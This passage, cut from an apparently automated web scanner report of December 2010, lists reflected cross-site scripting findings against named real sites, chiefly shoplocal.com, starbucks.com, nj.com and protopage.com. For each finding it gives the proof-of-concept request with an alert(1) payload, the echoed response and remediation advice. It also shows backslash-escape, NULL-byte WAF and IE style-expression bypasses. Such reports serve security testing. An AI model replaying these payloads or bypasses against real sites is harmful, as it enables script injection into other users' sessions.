GET /?c150d"><script>alert(1)</script>654dba14884=1 HTTP/1.1 Host: www.netvouz.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 07:26:06 GMT Server: IBM_HTTP_Server P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR NOR UNI COM NAV" Set-Cookie: JSESSIONID=0000ks_3VvqlBbQydKeP_fVaGme:-1; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 20724
4.274. http://www.nj.com/devils/index.ssf/devilsbeatreportersblog/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.nj.com
Path:
/devils/index.ssf/devilsbeatreportersblog/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49653'-alert(1)-'fefbcb3b6d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /devils/index.ssf/devilsbeatreportersblog/?49653'-alert(1)-'fefbcb3b6d0=1 HTTP/1.1 Host: www.nj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM' Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 07:35:07 GMT Date: Wed, 08 Dec 2010 07:35:06 GMT Connection: close Connection: Transfer-Encoding Content-Length: 42817
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf- ...[SNIP]... istpos = 'Leaderboard,SponsorLeft,Rectangle,SkyScraper2,Button2,BannerBottom,SiteSponsor,TxtLink1,TxtLink2,TxtLink3,TxtLink4,Feature1,Feature2,Feature3,Feature4,ImpactAd,BannerShared';
4.275. http://www.protopage.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.protopage.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6928c'%3balert(1)//c026ddc794a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6928c';alert(1)//c026ddc794a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?6928c'%3balert(1)//c026ddc794a=1 HTTP/1.1 Host: www.protopage.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!-- Copyright 2004-2008 Protopage Ltd. All rights reserved. --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Pro ...[SNIP]... <script type="text/javascript">pageParams['6928c';alert(1)//c026ddc794a'] = unescape('1'); protopageInit();</script> ...[SNIP]...
4.276. http://www.shoplocal.com/bayareacom/coupons.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/bayareacom/coupons.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60c86'-alert(1)-'5d576d414f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bayareacom/coupons.aspx?60c86'-alert(1)-'5d576d414f6=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=dwafkm452yd1bv55wlquhp45; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=City=San Jose&State=CA&CountryID=0&ZipCode5=95113&Sniff=0&DMA=807&DMAName=San+Francisco-Oakland-San+Jose%2c+CA&CLat=0.651588551849194&CLong=-2.12739690490063&NLat=0.654113970446351&SLat=0.649063133252036&WLong=-2.12992232349779&ELong=-2.12487148630347&MGN=Media News Group&MGATI=bayarea&MGVD=bayareacom&MGSID=715&MGPC=95113&SessionID=0; expires=Sat, 08-Dec-2035 07:28:12 GMT; path=/ Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/ Set-Cookie: SLHCookie=couponclippings=; expires=Sat, 08-Dec-2035 07:28:11 GMT; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:28:11 GMT Connection: close Content-Length: 63368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/bayareacom/default.aspx?60c86'-alert(1)-'5d576d414f6=1&action=coupons&viewmode=local&referrer=&random=1208199366&siteid=715&City=San%20Jose&State=CA&CountryID=0&ZipCode5=95113&Sniff=0&DMA=807&DMAName=San%2bFrancisco-Oakland-San%2bJose%252c%2bCA&CLat=0.6 ...[SNIP]...
4.277. http://www.shoplocal.com/bayareacom/home.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/bayareacom/home.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7f6d'-alert(1)-'15a1e51a800 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bayareacom/home.aspx?a7f6d'-alert(1)-'15a1e51a800=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=13czpr332qdrpbfnrkhx1w45; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=City=San Jose&State=CA&CountryID=0&ZipCode5=95113&Sniff=0&DMA=807&DMAName=San+Francisco-Oakland-San+Jose%2c+CA&CLat=0.651588551849194&CLong=-2.12739690490063&NLat=0.654113970446351&SLat=0.649063133252036&WLong=-2.12992232349779&ELong=-2.12487148630347&MGN=Media News Group&MGATI=bayarea&MGVD=bayareacom&MGSID=715&MGPC=95113&SessionID=0; expires=Sat, 08-Dec-2035 07:27:52 GMT; path=/ Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:27:51 GMT Connection: close Content-Length: 88920
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/bayareacom/default.aspx?a7f6d'-alert(1)-'15a1e51a800=1&action=home&viewmode=local&referrer=&random=756043606&siteid=715&City=San%20Jose&State=CA&CountryID=0&ZipCode5=95113&Sniff=0&DMA=807&DMAName=San%2bFrancisco-Oakland-San%2bJose%252c%2bCA&CLat=0.65158 ...[SNIP]...
4.278. http://www.shoplocal.com/bayareacom/topdeals.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/bayareacom/topdeals.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0001'-alert(1)-'4841da7a93c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bayareacom/topdeals.aspx?N=133245&source=bottom-hp-promo-box-photo&d0001'-alert(1)-'4841da7a93c=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=c4bagdm5tvansz55wjdur4vx; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=City=San Jose&State=CA&CountryID=0&ZipCode5=95113&Sniff=0&DMA=807&DMAName=San+Francisco-Oakland-San+Jose%2c+CA&CLat=0.651588551849194&CLong=-2.12739690490063&NLat=0.654113970446351&SLat=0.649063133252036&WLong=-2.12992232349779&ELong=-2.12487148630347&MGN=Media News Group&MGATI=bayarea&MGVD=bayareacom&MGSID=715&MGPC=95113&SessionID=0; expires=Sat, 08-Dec-2035 07:29:01 GMT; path=/ Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:29:01 GMT Connection: close Content-Length: 63242
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... t language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/bayareacom/default.aspx?N=133245&source=bottom-hp-promo-box-photo&d0001'-alert(1)-'4841da7a93c=1&action=topdeals&viewmode=local&referrer=&random=75777391&siteid=715&City=San%20Jose&State=CA&CountryID=0&ZipCode5=95113&Sniff=0&DMA=807&DMAName=San%2bFrancisco-Oakland-San%2bJose%252c%2bCA&CLat=0.65 ...[SNIP]...
4.279. http://www.shoplocal.com/bayareacom/topdealslanding.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/bayareacom/topdealslanding.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eff9a'-alert(1)-'017dd2487ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bayareacom/topdealslanding.aspx?eff9a'-alert(1)-'017dd2487ac=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=uctqe055q2v2mp45ia0ki245; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=City=San Jose&State=CA&CountryID=0&ZipCode5=95113&Sniff=0&DMA=807&DMAName=San+Francisco-Oakland-San+Jose%2c+CA&CLat=0.651588551849194&CLong=-2.12739690490063&NLat=0.654113970446351&SLat=0.649063133252036&WLong=-2.12992232349779&ELong=-2.12487148630347&MGN=Media News Group&MGATI=bayarea&MGVD=bayareacom&MGSID=715&MGPC=95113&SessionID=0; expires=Sat, 08-Dec-2035 07:28:02 GMT; path=/ Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:28:02 GMT Connection: close Content-Length: 64731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/bayareacom/default.aspx?eff9a'-alert(1)-'017dd2487ac=1&action=topdealslanding&viewmode=local&referrer=&random=1649612821&siteid=715&City=San%20Jose&State=CA&CountryID=0&ZipCode5=95113&Sniff=0&DMA=807&DMAName=San%2bFrancisco-Oakland-San%2bJose%252c%2bCA& ...[SNIP]...
4.280. http://www.shoplocal.com/bayareacom/weeklyads.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/bayareacom/weeklyads.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc802'-alert(1)-'87982113989 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bayareacom/weeklyads.aspx?cc802'-alert(1)-'87982113989=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=kj431045lgeuei45wq410hmj; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=City=San Jose&State=CA&CountryID=0&ZipCode5=95113&Sniff=0&DMA=807&DMAName=San+Francisco-Oakland-San+Jose%2c+CA&CLat=0.651588551849194&CLong=-2.12739690490063&NLat=0.654113970446351&SLat=0.649063133252036&WLong=-2.12992232349779&ELong=-2.12487148630347&MGN=Media News Group&MGATI=bayarea&MGVD=bayareacom&MGSID=715&MGPC=95113&SessionID=0; expires=Sat, 08-Dec-2035 07:28:11 GMT; path=/ Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:28:11 GMT Connection: close Content-Length: 80970
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/bayareacom/default.aspx?cc802'-alert(1)-'87982113989=1&action=weeklyads&viewmode=local&referrer=&random=1732661145&siteid=715&City=San%20Jose&State=CA&CountryID=0&ZipCode5=95113&Sniff=0&DMA=807&DMAName=San%2bFrancisco-Oakland-San%2bJose%252c%2bCA&CLat=0 ...[SNIP]...
4.281. http://www.shoplocal.com/san+jose/home.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/san+jose/home.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d77b3'-alert(1)-'5ec98484488 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /san+jose/home.aspx?d77b3'-alert(1)-'5ec98484488=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=ctormv552br0zm3b14ze5d45; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; expires=Sat, 08-Dec-2035 07:28:20 GMT; path=/ Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:28:19 GMT Connection: close Content-Length: 59956
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?d77b3'-alert(1)-'5ec98484488=1&action=home&viewmode=local&referrer=&random=853919979&siteid=252&SessionID=0&pagecounter=1&detid=9940000000&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
4.282. http://www.shoplocal.com/searchlocal.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.shoplocal.com
Path:
/searchlocal.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96ae7'-alert(1)-'43e0e349385 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /searchlocal.aspx?searchtext=macy%27s&N=150006&96ae7'-alert(1)-'43e0e349385=1 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=amfhk0bd4a0g23ji2ctacojf; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; expires=Sat, 08-Dec-2035 07:31:00 GMT; path=/ Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:31:00 GMT Connection: close Content-Length: 169501
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... <script language="javascript"> var pt = new Image(); pt.src = 'http://pt.crossmediaservices.com/pt/default.aspx?searchtext=macys&N=150006&96ae7'-alert(1)-'43e0e349385=1&action=searchlocal&viewmode=local&referrer=&random=754426768&siteid=252&SessionID=0&pagecounter=1&detid=9940000000&slhlogon=' + readSubCookie('SLHUID','UID');</script> ...[SNIP]...
The value of the searchtext request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e89f6\'%3balert(1)//ad193ef8653 was submitted in the searchtext parameter. This input was echoed as e89f6\\';alert(1)//ad193ef8653 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /searchlocal.aspx?searchtext=macy%27se89f6\'%3balert(1)//ad193ef8653&N=150006 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=jcvqvh4514ubdj55tsoiiv55; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; expires=Sat, 08-Dec-2035 07:29:04 GMT; path=/ Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:29:03 GMT Connection: close Content-Length: 34507
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head> < ...[SNIP]... earchlocal&redirsite=adsense&channel=searchlocal%2cUNPAID&keyword=macy%27se89f6%5c%27%3balert(1)%2f%2fad193ef8653&format=NarrowFormat&adsrequested=4&n=' + numberOfAdsReturned; var query = 'macy\'se89f6\\';alert(1)//ad193ef8653'; var siteId = '252'; var channelIds = 'searchlocal,UNPAID'; var adFormat = 'n4';
The value of the searchtext request parameter is copied into the HTML document as plain text between tags. The payload e27fb<script>alert(1)</script>fed7298afb2 was submitted in the searchtext parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /searchlocal.aspx?searchtext=macy%27se27fb<script>alert(1)</script>fed7298afb2&N=150006 HTTP/1.1 Host: www.shoplocal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=nlzoqxvmt2c2kpv5v2bjsy45; path=/; HttpOnly X-AspNet-Version: 2.0.50727 Set-Cookie: SLHCookie=MGN=shoplocal&MGATI=&MGVD=shoplocal&MGSID=252&MGPC=60610&SessionID=0; expires=Sat, 08-Dec-2035 07:29:22 GMT; path=/ Set-Cookie: Prefs=SLHPageCounter=1&detid=9940000000&SessionCookiesSet=true; path=/ Set-Cookie: BroadreachLocalMode=Y; path=/ P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:29:22 GMT Connection: close Content-Length: 34800
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
// Setup Adsense parameters google_afs_query = 'macy\'se27fb<script>alert(1)</script>fed7298afb2'; google_afs_ad = 'n4'; // specify the number of ads you are requesting google_afs_client = 'shoplocal_js'; // substitute your client ID google_afs_channel = 'searchlocal,UNPAID'; // enter your com ...[SNIP]...
4.285. https://www.starbucks.com/card [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.starbucks.com
Path:
/card
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9196"style%3d"x%3aexpression(alert(1))"2bb14a09209 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9196"style="x:expression(alert(1))"2bb14a09209 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /card?f9196"style%3d"x%3aexpression(alert(1))"2bb14a09209=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: .SbuxAuth=; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:41:40 GMT Connection: close Content-Length: 38019
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="https://www.starbucks.com/card?f9196"style="x:expression(alert(1))"2bb14a09209=1"/> ...[SNIP]...
4.286. https://www.starbucks.com/card/rewards/card-rewards-canada [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.starbucks.com
Path:
/card/rewards/card-rewards-canada
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26c4c"style%3d"x%3aexpression(alert(1))"4bdf545b85e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26c4c"style="x:expression(alert(1))"4bdf545b85e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /card/rewards/card-rewards-canada?26c4c"style%3d"x%3aexpression(alert(1))"4bdf545b85e=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: .SbuxAuth=; lf=0; ASP.NET_SessionId=lgecttv1p0hdcndyafhr1ahm; skin=;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Wed, 08 Dec 2010 07:42:47 GMT Connection: close Content-Length: 37206
